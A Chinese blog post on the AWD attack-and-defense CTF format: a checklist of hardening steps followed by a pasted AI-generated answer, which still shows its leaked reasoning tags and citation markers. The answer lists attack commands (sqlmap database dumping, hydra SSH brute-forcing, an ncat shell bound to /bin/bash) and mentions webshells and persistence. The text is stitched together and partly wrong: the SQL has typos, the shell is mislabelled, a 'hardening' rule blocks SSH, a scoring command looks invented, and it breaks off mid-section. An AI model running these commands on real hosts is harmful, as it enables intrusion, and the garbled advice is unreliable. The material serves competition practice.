AWD攻防模式

1.修改ssh密码,看看能不能登陆别人的。

$ passwd
ctrl+insert
shift+inset

2.dump源码

filezilla等图形化工具
scp命令

3.修改后台登陆密码

4.备份数据库,修改数据库密码

mysql -u root -p
enter password;
mysql>use mysql
mysql>update user set password=passwprD(“test”) where uer=‘root’;
mysql>flush privileges;(命令本质上的作用是将当前user和privilige表中的用户信息/权限设置从mysql库(MySQL数据库的内置库)中提取到内存里,希望在”不重启MySQL服务”的情况下修改直接生效)
mysql>exit;

备份
mysqldump -u root -p root > /var/www/mydb.sql
mysql -u root -p
use 数据库名;
set names 编码方式
source /var/www/mydb.sql

mysql -u root -p root </var/www/mydb.sql

5.D盾查杀

在这里插入图片描述

6.找漏洞,代码审计(可用工具seay,给个方向

在这里插入图片描述

7.上监控脚本,日志分析

这个以后再说吧

8.关闭不必要的端口

netstat -napt查看端口
lsof -i :port查看端口被哪个进程占用
kill -9 PID杀掉进程

9.webshell,维权

一句话
不死马
反弹shell
不死马杀进程,重启服务器

10.常见漏洞

一句话木马
在这里插入图片描述
sql注入
文件包含
在这里插入图片描述

文件上传,越权访问,命令执行等

<think>好的,用户想了解AWD攻防赛的比赛流程以及相关的命令。我需要先整理AWD的基本流程,然后列举常用的安全命令。首先,根据引用[2],AWD攻防模式,常见于线下赛,所以比赛流程可能包括准备阶段、攻防对抗、积分结算。 比赛流程部分,需要分阶段说明。比如准备阶段可能包括环境搭建和漏洞检查,攻防阶段包括漏洞利用和防御加固,最后积分结算。需要注意每个阶段的具体任务,比如加固服务、修复漏洞等。 然后是常用命令,需要涵盖漏洞检测、防御加固、攻击利用、流量监控和权限维持等方面。比如nmap扫描、Docker命令、Web漏洞利用工具如sqlmap、抓包工具tcpdump、后门维持如nc等。要确保命令准确,并且解释清楚用途。 用户可能还希望知道具体例子,比如如何用hydra爆破SSH,或者如何用Docker快速重启服务。同时,需要引用相关参考资料,比如引用[2]提到AWD是CTF的一种模式,引用[3]可能涉及学习资源中的工具使用。 需要检查是否有遗漏的步骤或命令,确保覆盖主要方面。另外,用户可能对流程中的细节有疑问,比如如何应对攻击,或者如何有效监控流量,所以相关问题部分可以设计这些问题。 最后,确保回答结构清晰,分点说明,符合用户要求的格式,使用中文,数学公式用正确格式,虽然这里可能不太涉及数学内容,但如果有变量或代码,要正确使用格式。</think>### AWD攻防赛比赛流程详解 AWD(Attack With Defense)攻防赛主要分为三个阶段: 1. **准备阶段(30-60分钟)** - 获取比赛环境(通常为Docker容器)和SSH登录凭证 - 通过`nmap -sV 靶机IP`扫描目标服务 - 使用`docker ps`查看当前运行服务 - 使用`find / -name "flag"`定位关键文件[^2] 2. **攻防对抗阶段(2-4小时)** - 攻击环节: ```bash # Web漏洞利用示例 sqlmap -u "http://靶机IP/login.php" --data="username=admin&password=123" --dump hydra -l root -P pass.txt ssh://靶机IP ``` - 防御环节: ```bash # 服务加固示例 chmod 644 /var/www/html/config.php iptables -A INPUT -p tcp --dport 22 -j DROP ``` 3. **积分结算阶段** - 通过`cat /tmp/score.txt`查看实时得分 - 系统自动统计服务存活时长和flag提交数量[^2] ### 常用安全命令详解 | 类别 | 命令示例 | 用途说明 | |------------|--------------------------------------------------------------------------|------------------------------| | 漏洞检测 | `nmap -p 1-65535 -T4 靶机IP` | 全端口扫描 | | 防御加固 | `docker restart web_server` | 快速重启异常服务 | | 流量监控 | `tcpdump -i eth0 -w attack.pcap port 80` | 抓取Web攻击流量 | | 权限维持 | `ncat -lvp 4444 -e /bin/bash` | 创建反弹shell | | 文件监控 | `inotifywait -m /var/www/html -r -e create,delete,modify` | 实时监控网站文件变更 | ### 攻防对抗实战技巧 1. **快速应急响应** 发现服务异常时,立即使用`docker exec -it 容器ID /bin/bash`进入容器排查,通过`lastlog`查看最近登录记录,使用`netstat -antp`检查异常连接。 2. **自动化脚本示例** ```python # 自动化提交flag脚本 import requests while True: flag = get_flag() # 自定义获取flag方法 requests.post("http://提交平台URL", data={"flag": flag}) ``` ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值